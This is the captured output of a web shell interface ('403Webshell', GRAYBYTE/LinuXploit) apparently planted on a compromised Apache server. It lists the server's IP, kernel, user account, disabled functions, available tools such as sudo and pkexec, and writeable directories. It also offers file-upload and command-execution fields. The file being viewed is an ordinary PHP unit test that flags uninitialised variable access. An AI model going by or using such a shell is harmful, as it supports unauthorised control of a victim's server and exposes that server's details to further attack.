- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.221.165.190
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/www/mesa/setup/test/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/www/mesa/setup/test/tests/test.unitialized.php
<?php
require_once "class.test.php";
require_once "class.php_analyze.php";

class UnitializedVars extends Test {
    var $name = "Access to unitialized variables";

    function testUnitializedUsage() {
        $scripts = static::getAllScripts();
        $matches = array();
        foreach ($scripts as $s) {
            $a = new SourceAnalyzer($s);
            $a->parseFile();
            foreach ($a->bugs as $bug) {
                if ($bug['type'] == 'UNDEF_ACCESS') {
                    list($line, $file) = $bug['line'];
                    $this->fail($file, $line, "'{$bug['name']}'");
                }
                elseif ($bug['type'] == 'MAYBE_UNDEF_ACCESS') {
                    list($line, $file) = $bug['line'];
                    $this->warn("Possible access to NULL object @ $file : $line");
                }
            }
            if (!$a->bugs)
                $this->pass();
        }
    }
}

return 'UnitializedVars';
?>

Youez - 2016 - github.com/yon3zu
LinuXploit